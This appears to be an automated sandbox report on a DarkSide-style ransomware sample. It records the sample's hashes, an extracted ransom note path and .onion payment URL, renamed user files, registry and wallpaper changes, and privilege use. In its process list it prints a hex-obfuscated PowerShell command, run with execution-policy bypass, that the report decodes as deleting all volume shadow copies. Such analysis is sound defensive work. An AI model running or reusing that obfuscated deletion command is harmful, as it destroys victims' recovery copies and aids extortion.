Analysis
- max time kernel: 15s
- max time network: 66s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 16-01-2021 16:12

Static task: static1

Behavioral task: behavioral1
- Sample: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
- Resource: win7v20201028

Behavioral task: behavioral2
- Sample: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
- Resource: win10v20201028
General
- Target: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
- Size: 59KB
- MD5: 0ed51a595631e9b4d60896ab5573332f
- SHA1: 7ae73b5e1622049380c9b615ce3b7f636665584b
- SHA256: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
- SHA512: 9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5
Malware Config
Extracted:
- C:\\README.13f17753.TXT
- http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
Signatures

Modifies extensions of user files (16 IoCs)
Ransomware generally changes the extension on encrypted files.
Process (all rows): 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
- File renamed: C:\Users\Admin\Pictures\DisableCheckpoint.raw => C:\Users\Admin\Pictures\DisableCheckpoint.raw.13f17753
- File opened for modification: C:\Users\Admin\Pictures\DisableCheckpoint.raw.13f17753
- File renamed: C:\Users\Admin\Pictures\OptimizeOut.crw => C:\Users\Admin\Pictures\OptimizeOut.crw.13f17753
- File opened for modification: C:\Users\Admin\Pictures\OptimizeOut.crw.13f17753
- File opened for modification: C:\Users\Admin\Pictures\SkipResume.png.13f17753
- File renamed: C:\Users\Admin\Pictures\CompareEnter.raw => C:\Users\Admin\Pictures\CompareEnter.raw.13f17753
- File opened for modification: C:\Users\Admin\Pictures\CompareEnter.raw.13f17753
- File opened for modification: C:\Users\Admin\Pictures\CompleteRegister.crw.13f17753
- File renamed: C:\Users\Admin\Pictures\FormatWait.png => C:\Users\Admin\Pictures\FormatWait.png.13f17753
- File renamed: C:\Users\Admin\Pictures\CompleteRegister.crw => C:\Users\Admin\Pictures\CompleteRegister.crw.13f17753
- File renamed: C:\Users\Admin\Pictures\HideCompare.tif => C:\Users\Admin\Pictures\HideCompare.tif.13f17753
- File renamed: C:\Users\Admin\Pictures\SkipResume.png => C:\Users\Admin\Pictures\SkipResume.png.13f17753
- File opened for modification: C:\Users\Admin\Pictures\UnpublishExpand.crw.13f17753
- File opened for modification: C:\Users\Admin\Pictures\FormatWait.png.13f17753
- File opened for modification: C:\Users\Admin\Pictures\HideCompare.tif.13f17753
- File renamed: C:\Users\Admin\Pictures\UnpublishExpand.crw => C:\Users\Admin\Pictures\UnpublishExpand.crw.13f17753
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Sets desktop wallpaper using registry (2 TTPs, 2 IoCs)
Process (all rows): 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\13f17753.BMP"
- Set value (str): \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\13f17753.BMP"
Modifies Control Panel (1 IoCs)
Process: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Desktop\WallpaperStyle = "10"
Modifies registry class (5 IoCs)
Process (all rows): 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.13f17753
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.13f17753\ = "13f17753"
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\13f17753\DefaultIcon
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\13f17753
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\13f17753\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\13f17753.ico"
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes (pid, process):
- 1584 powershell.exe
- 1584 powershell.exe
- 1584 powershell.exe
- 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
- 1140 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
Suspicious use of AdjustPrivilegeToken (25 IoCs)
Processes (description, pid, process):

PID 1140, 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe:
- Token: SeIncreaseQuotaPrivilege
- Token: SeSecurityPrivilege
- Token: SeTakeOwnershipPrivilege
- Token: SeLoadDriverPrivilege
- Token: SeSystemProfilePrivilege
- Token: SeSystemtimePrivilege
- Token: SeProfSingleProcessPrivilege
- Token: SeIncBasePriorityPrivilege
- Token: SeCreatePagefilePrivilege
- Token: SeBackupPrivilege
- Token: SeRestorePrivilege
- Token: SeShutdownPrivilege
- Token: SeDebugPrivilege
- Token: SeSystemEnvironmentPrivilege
- Token: SeRemoteShutdownPrivilege
- Token: SeUndockPrivilege
- Token: SeManageVolumePrivilege
- Token: 33
- Token: 34
- Token: 35
- Token: 36

PID 1584, powershell.exe:
- Token: SeDebugPrivilege

PID 936, vssvc.exe:
- Token: SeBackupPrivilege
- Token: SeRestorePrivilege
- Token: SeAuditPrivilege
Suspicious use of WriteProcessMemory (2 IoCs)
Processes (description, pid, process, target process):
- PID 1140 wrote to memory of 1584: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe => powershell.exe
- PID 1140 wrote to memory of 1584: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe => powershell.exe
Processes

- C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe"
  - Modifies extensions of user files
  - Sets desktop wallpaper using registry
  - Modifies Control Panel
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - Child process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
    (The hex string decodes byte by byte to "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}", i.e. deletion of all volume shadow copies before encryption; this accounts for the vssvc.exe (Volume Shadow Copy service) process below and the SeBackupPrivilege/SeRestorePrivilege tokens it acquires.)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Downloads

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  - MD5: 010c219c46b4439bc787644989e20389
  - SHA1: f3a63066ab4446458bd6417386777e39e09b9b25
  - SHA256: 2a7c264d94398912c720de578b6d959b2457582182b8f2cc98281f27ef6701aa
  - SHA512: c6967d2a37b9a45f491138b638d99e5fa09ef38f680c887bfbc2336c683deae86f4d6626f6defc8c0aabccf545923a708df05825de8102086a8f333a58e74963

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  - MD5: dc7fea20798126457bee02ede3690164
  - SHA1: abfc2ec2d1c29bcf7deedb1cbcd864108eff9d02
  - SHA256: 64e4a1402bcd5107f23949a98b608c108856a5da1f08ec016aad39425fb0d6ae
  - SHA512: 1d8c1f9db7d8a17dddb005407f49a47bae3400b8d0f091653e7b22d5fdeb083c9749e018debdd8c9b2d7b7d4767b2a6455c693c09ba8c29c36dca43a553ec650

- memory/1584-2-0x0000000000000000-mapping.dmp
- memory/1584-3-0x00007FFB55FB0000-0x00007FFB5699C000-memory.dmp (Filesize: 9.9MB)
- memory/1584-4-0x000001B2FA430000-0x000001B2FA431000-memory.dmp (Filesize: 4KB)
- memory/1584-5-0x000001B2FD0D0000-0x000001B2FD0D1000-memory.dmp (Filesize: 4KB)